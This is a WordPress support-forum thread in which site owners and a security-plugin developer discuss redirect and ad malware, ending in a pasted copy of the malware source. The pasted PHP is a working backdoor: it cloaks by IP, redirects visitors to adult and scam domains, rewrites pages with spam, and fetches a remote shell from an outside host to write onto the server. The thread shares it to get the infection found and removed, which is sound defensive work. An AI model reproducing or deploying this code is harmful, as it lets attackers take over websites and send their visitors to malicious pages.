rogueads.unwanted_ads 16
-
Greetings Eli
I decided to open a new thread as the previous one was about the scan not completed but you helped me to fix it positively.
However, I am still stuck with this problem, and I have not found a solution on the internet, I have searched carefully but I only get solutions to that error about files that in my case have not been generated.
I honestly don’t know what to do … the malware won’t let me modify the template, or edit with elementor (it doesn’t load) in addition to redirecting to other sites.
do you think something can be done about it?
Beforehand, thank you very much!
The page I need help with: [log in to see the link]
-
Given the position of the unwanted ad code I would say it’s coming from an add_filter call to the astra_head_top hook. This call could be embedded in any PHP file on your site but it has most likely been added to your theme’s functions.php file or injected into one of your plugins. If this is not being detected by the Complete Scan in my plugin then can you please send me a screenshot of the scan results so I can see if I can spot why it might be missing this one?
Greetings Eli,
As I mentioned before, on the server I have 3 websites, all infected with malware, the main one is chiksfashion.com, I have another 2 but it is not in use, however, I constantly update all the plugins to avoid risks of security. In both I installed your plugins and scanned for malware.
I share the results in all of them in case you see something different that can better guide you in solving the case =)
https://ibb.co/y0PzxJ3
https://ibb.co/tYbGXkVhttps://ibb.co/6YyYbtt
https://ibb.co/TrgFRnRhttps://ibb.co/qBRwZCs
https://ibb.co/fMQJ3FdEli, thank you very much!
AS I said, it looks like this threat is using the astra_head_top hook. Try searching the code for any mention of “astra_head_top”.
Thank you Eli, for your quick response and interest in solving the problem.
When you mention “searching the code for any mention of” astra_head_top “do you mean exactly ..?
Sorry, my knowledge in the area is limited, but I try my best =)
I looked for the term “astra_head_top” in the theme’s function.php file, but it did not return any results.
I also did it in the header.php file of the theme and this appeared:
<head>
<? php astra_head_top (); ?>
<meta charset = “<? php bloginfo (‘charset’);?>”>
<meta name = “viewport” content = “width = device-width, initial-scale = 1”>
<link rel = “profile” href = “https://gmpg.org/xfn/11”><? php wp_head (); ?>
<? php astra_head_bottom (); ?>
</head>I share it because of the link that appears there, I am ashamed not to know where to look …
I don’t know if there is a way to search within the general files to find the code you mention.
Again, thank you very much!
Eli
Install a plugin called I security, since then I have received emails indicating that a certain file was modified, I just received one from one of the pages that are not being used and they have practically nothing, in which they mention that:
wp-includes / class-wp-http-netfilter.php has been modified on 21 August 2020 12:05 PM under the Hash of the file b905c87515ea51c73c4bbe01f3e59f7fWhen looking for that file it throws me only IP addresses (I think)
178,162,204,238
50.87.177.133
200.56.44.184
167.114.89.197
To put some ..I don’t know if it helps
The easiest way to search the files on your site would be at the command line on your server, if you have SSH access to your server you can use the grep command with the -r parameter to search for a text string in all the files in your public_html directory. If you don’t have access to your the command line on your server then you would probably need to download a compete copy of your site so that you can search the file on your PC.
A better lead might be to try and figure out what PHP script was responsible for writing those IP addressed to that class-wp-http-netfilter.php file. There is nothing inherently malicious about having IPs logged in a file but it is suspicious and it could be the forensic evidence we need to find the malicious code as long as you haven’t deleted or tampered with that file since it was created. What you need to do is look in the access_log files on your server for any activity on the site at the exact time that this file was created. Then we should have a good lead on how and why these IPs were written to that file. Please send me any files of scripts that you find that might be part of this new threat for my definition updates so that my plugin will be able to remove then automatically in future scans.
Greetings again Eli,
I am still very grateful for your willingness to solve my problem, today I have taken all afternoon to try to solve the problem but I have not been able to. I have tried to follow the steps you indicated, seeing the SSH option, I do not see any option to use the command you indicate, so I have downloaded the site on my pc to search for it manually, but I have not known how to do it.
I have Malwarebytes installed on my PC and the malware appeared in chrome, this is the window that opens from the infected websites.
I’ll give you the report for what it’s worth
Malwarebytes
https://www.malwarebytes.com-Registration details-
Protection event date: 8/25/20
Protection event time: 18:21
Log file: 646b6efe-e721-11ea-a5d8-ccaf78a47f4c.json-Software information-
Version: 4.2.0.82
Components version: 1.0.1025
Update package version: 1.0.29053
License: Trial-System information-
OS: Windows 10 (Build 18362.1016)
CPU: x64
File system: NTFS
User: System-Details of the blocked website-
Malicious website: 1
, C: \ Program Files(x86)\Google\Chrome\Application\chrome.exe,Blocked,-1,-1,0.0.0,,-Website data-
Category: Trojan
Domain: win-your-prize-now1.life
IP address: 5.188.178.85
Port: 443
Type: Outgoing
File: C: \ Program Files (x86) \ Google \ Chrome \ Application \ chrome.exe
(end)Honestly, I don’t know what else to do.
If for some reason you want my server data to expand your bank of viruses disinfected by your renowned plugin =) I am willing to provide the necessary data =)
In addition to making a well-deserved donation.
Anyway, I am attentive to any comments.
Again thank you very much!
Hello,
I have the exact same issue with my multi site host, and I’ve run a find with grep for the astra_head issue, but cannot find it in any php file. Also ran it everywhere and didn’t find it. Any other information you may have would be great
Di you try getting a hold of your access_log file? I think that might be the key to finding out what script wrote those IP addresses to that class-wp-http-netfilter.php file.
If there is anything that you don’t want to post here you can send any sensitive details directly to me:
eli AT gotmls DOT netThank you, I’ll send you an email with the only logs i can pull from my host, but they only show client access, not file access
i have found another file that is probably linked, it’s called .default and it is copied all over the place in the shared host. I don’t have the time logs of when it was created but i’ll attach it to the email as well.
here is a copy of the .default file
<?php // $knockInUrl = 'https://1.karanbit.com/lnk/don/1.php'; // // //function isHttps() { // if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || // (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || // (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || // (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || // (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { // $server_request_scheme = 'https'; // } else { // $server_request_scheme = 'http'; // } // return $server_request_scheme; //} // //$knockScheme = isHttps(); //$knockUrl = "{$knockScheme}://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}"; // // //$curl = curl_init(); //curl_setopt($curl, CURLOPT_URL, $knockInUrl); //curl_setopt($curl, CURLOPT_POST, true); //curl_setopt($curl, CURLOPT_POSTFIELDS, $knockUrl); // //$response = curl_exec($curl); // //curl_close($curl); if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://karanbit.com/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); /////////////////////////////////////////////////////////////// if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } /////////////////////////////////////////////////////////////// //linkovka $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; $r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}"; if (preg_match_all("/5.45.69.4|185.104.184.43|134.19.179.131|213.152.180.5|185.200.116.203|141.98.102.235|134.19.179.195|185.156.175.35|178.162.204.214|82.102.27.163|37\.1\.217\..*|5.2.79.82|213.111.153.156|134.19.179.235|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) { //if (preg_match_all("/ecocyclerieloirelayonaubance.fr|daruselamguesthouse.com/", $host, $matches)) { if (!preg_match_all("/page2-/", $id, $matches)) { $ch = curl_init(); $url_string = ''; //$url_string = 'https://fst.sex-dating77.com/links/mix/page2-1-1-x'.rand(1,88).'dddddd/'; curl_setopt ($ch, CURLOPT_URL, $url_string); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; $r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}"; curl_setopt($ch, CURLOPT_REFERER, $r); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR'])); $html = curl_exec ($ch); if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") { if (preg_match('~Location: (.*)~i', $html, $match)) { $location = trim($match[1]); } curl_close($ch); header('Location: ' . $location); exit(); } $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $header = substr($html, 0, $header_size); $html = substr($html, $header_size); curl_close($ch); if (isset($_SERVER['HTTP_USER_AGENT'])) $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}"; if (strstr($id, ".css")){ header('Content-Type: text/css; charset=utf-8'); } elseif (strstr($id, ".png")){ header('Content-Type: image/png'); } elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){ header('Content-Type: image/jpeg'); } elseif (strstr($id, ".gif")){ header('Content-Type: image/gif'); } elseif (strstr($id, ".xml")){ header('Content-Type: application/xml'); } echo $html; //exit; } } if (preg_match_all("/g2gg$/", $id, $matches) ) { // $user_ip = getUserIP(); //echo $user_ip; echo $user_ip; echo '1111'; } //if (preg_match_all("/fjerritslev-gym.dk|espressobar.dk|tomyamthailand.com|goshopping.support|akait.dk|serop.dk|nielsbuus.dk|traume.dk|jesperastrom.com|kolding-netavis.dk/", $r, $matches) ) { //$tr = preg_replace ('#^www\.#', '', $_SERVER['SERVER_NAME']); //$tr = preg_replace ('#^[^\.]*#', '', $tr); //$tr = str_replace('.', '', $tr); //} //if (!preg_match_all("/fjerritslev-gym.dk|espressobar.dk|tomyamthailand.com|goshopping.support|akait.dk|serop.dk|nielsbuus.dk|traume.dk|jesperastrom.com|kolding-netavis.dk/", $r, $matches) ) { $tr = preg_replace('#^www\.#', '', $_SERVER['SERVER_NAME']); $tr = str_replace('.', '', $tr); //} $uag = $_SERVER['HTTP_USER_AGENT']; $user_ip = getUserIP(); if (preg_match_all("/page2-/", $id, $matches) ) { //урл страницы //if (preg_match_all("/ecocyclerieloirelayonaubance.fr|daruselamguesthouse.com/", $host, $matches)) { // echo $user_ip; //dorgen//////////////////////////////// $ch = curl_init(); if (preg_match_all("/google|bing|msn|yahoo/", $r, $matches) ) { if (!preg_match_all("/213.111.153.217|5.45.69.4|134.19.179.131|185.104.184.43|213.152.180.5|141.98.102.235|134.19.179.195|178.162.204.214|185.156.175.35|82.102.27.163|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) { $url_string = 'https://fst.sex-dating77.com/mix/'.$tr.'/'.$id.''; } } if (preg_match_all("/213.111.153.217|5.45.69.4|134.19.179.131|185.104.184.43|213.152.180.5|141.98.102.235|134.19.179.195|178.162.204.214|82.102.27.163|185.156.175.35|37\.1\.217\..*|213.152.161.20|213.152.161.138|66\.249\..*|64.68.90..*|216.239..*|65.52.104..*|65.52.108..*|65.55.24..*|65.55.52..*|65.55.55..*|65.55.213..*|65.55.217..*|131.253.24..*|131.253.46..*|40.77.167..*|199.30.27..*|157.55.16..*|157.55.18..*|157.55.32..*|157.55.36..*|157.55.48..*|157.55.109..*|157.55.110.4.*|157.56.92..*|157.56.93..*|157.56.94..*|157.56.229..*|199.30.16..*|207.46.12..*|207.46.192..*|207.46.195..*|207.46.199..*|207.46.204..*|157.55.39..*/", $user_ip, $matches)) { $url_string = 'https://fst.sex-dating77.com/mix/'.$tr.'/'.$id.''; } curl_setopt ($ch, CURLOPT_URL, $url_string); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; $r="{'HOST':'".$host."', 'REFFER':'".$ref.", 'URI': '". $uri ."', 'URL':'".$host.$uri."' '}"; curl_setopt($ch, CURLOPT_REFERER, $r); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $_SERVER['REMOTE_ADDR'])); $html = curl_exec ($ch); if ( curl_getinfo($ch, CURLINFO_RESPONSE_CODE) == "302") { if (preg_match('~Location: (.*)~i', $html, $match)) { $location = trim($match[1]); } curl_close($ch); header('Location: ' . $location); exit(); } $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $header = substr($html, 0, $header_size); $html = substr($html, $header_size); curl_close($ch); if (isset($_SERVER['HTTP_USER_AGENT'])) $url_string = "User-Agent: {$_SERVER['HTTP_USER_AGENT']}"; if (strstr($id, ".css")){ header('Content-Type: text/css; charset=utf-8'); } elseif (strstr($id, ".png")){ header('Content-Type: image/png'); } elseif (strstr($id, ".jpg") || strstr($id, ".jpeg")){ header('Content-Type: image/jpeg'); } elseif (strstr($id, ".gif")){ header('Content-Type: image/gif'); } elseif (strstr($id, ".xml")){ header('Content-Type: application/xml'); } if(strstr($header, 'pdf')) header('Content-Type: application/pdf'); echo $html; // exit; } ///////tds $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword = $_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); //$url = "https://keitr.sex-dating77.com/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_7=".$_SERVER['REQUEST_URI']."&" . http_build_query($_GET) . ""; $url = "https://me.sex-dating77.com/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_7=".$_SERVER['REQUEST_URI']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); if (!empty($result->redirect)) { foreach($result->redirect->headers as $header) { header($header); } if ($result->redirect->content) { echo $result->redirect->content; } } } ///////ztds @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "ee4c20179023749bb8474d2af81e5281"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('https://karanbit.com/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!<br><a href=/{$eb}xml.php>go</a>"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("https://karanbit.com/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("https://karanbit.com/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("https://karanbit.com/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("https://karanbit.com/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#<html#is', $ttxt)) { echo $ttxt; file_put_contents("{$eb}{$st}/$page.html", $ttxt); die(); } preg_match('#gogogo(.*)enenen#is', $ttxt, $mtchs); $etxt = explode('||', $mtchs[1]); $key = $etxt[0]; $title = ucfirst($key); $h1 = ucfirst($etxt[1]); $rating = rand(4,5); $rcount = rand(22,222); $txt = "<div itemscope=\"\" itemtype=\"https://schema.org/Product\">\n<span itemprop=\"name\">$parkey rating</span>\n<div itemprop=\"aggregateRating\" itemscope=\"\" itemtype=\"https://schema.org/AggregateRating\">\n<span itemprop=\"ratingValue\">$rating-5</span> stars based on\n<span itemprop=\"reviewCount\">$rcount</span> reviews\n</div>\n</div>\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("https://karanbit.com/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "<a href=\"https://$newclpage\">$parkey</a> "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('#<a (.*)</a>#iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('</body>', "<footer> <div class=\"tags_cloud footer column block\" id=\"tags_cloud footer column block\"> $cldwfooter </div> </footer> </body>", $my_content); } } if (!$morda) { $my_content = preg_replace('#<title(.*)<\/title>#iUs', "<title>$title</title>", $my_content, 1); $my_content = preg_replace("#<link rel=[\"\']{1}canonical(.*)\>#iUs", '', $my_content); $my_content = preg_replace("#<link rel=[\"\']{1}shortlink(.*)\>#iUs", '', $my_content); $my_content = preg_replace('#<h1(.*)<\/h1>#iUm', "<h1>$h1</h1>", $my_content, 1); $my_content = preg_replace('#<h2(.*)<\/h2>#iUm', "<h2>$h1</h2>", $my_content, 1); $my_content = preg_replace('#<h3(.*)<\/h3>#iUm', "<h3>$h1</h3>", $my_content, 1); $my_content = preg_replace("#<meta name=[\"\']{1}description(.*)\>#iUs", '', $my_content); $my_content = preg_replace("#<meta name=[\"\']{1}robots(.*)\>#iUs", '', $my_content); $my_content = preg_replace("#<meta name=[\"\']{1}keywords(.*)\>#iUs", '', $my_content); $my_content = str_replace('</head>', "<meta name=\"description\" content=\"$desc\"> </head>", $my_content); $my_content = preg_replace("#<meta property=[\"\']{1}og:(.*)[\"\']{1} content=[\"\']{1}.*[\"\']{1}\s?\/>#iUs", '', $my_content); $my_content = preg_replace('#<script(.*)<\/script>#iUs', '', $my_content, 1); if (@preg_match('#<article(.*)<\/article>#iUs', $my_content)) { $my_content = preg_replace('#<article(.*)<\/article>#iUs', "<article> $txt </article>", $my_content, 1); } elseif (@preg_match('#<div id="page-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="page-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="page-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="page-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="maincontent">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="maincontent">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="home-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="home-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="content"(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="content"(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content"(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content"(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content" class="clearfix">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content" class="clearfix">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content" class="hfeed">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content" class="hfeed">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="content clearfix">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="content clearfix">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="body_container">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="body_container">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="content" class="widecolumn">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="content" class="widecolumn">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="entry-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div id="entry-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div class="entry-content">(.*)</div>#iUs', $my_content)) { $my_content = preg_replace('#<div class="entry-content">(.*)</div>#iUs', "<div>\n$txt\n</div>", $my_content, 1); } elseif (@preg_match('#<div id="main-content">(.*)</div>#iUs', $my_content)) { 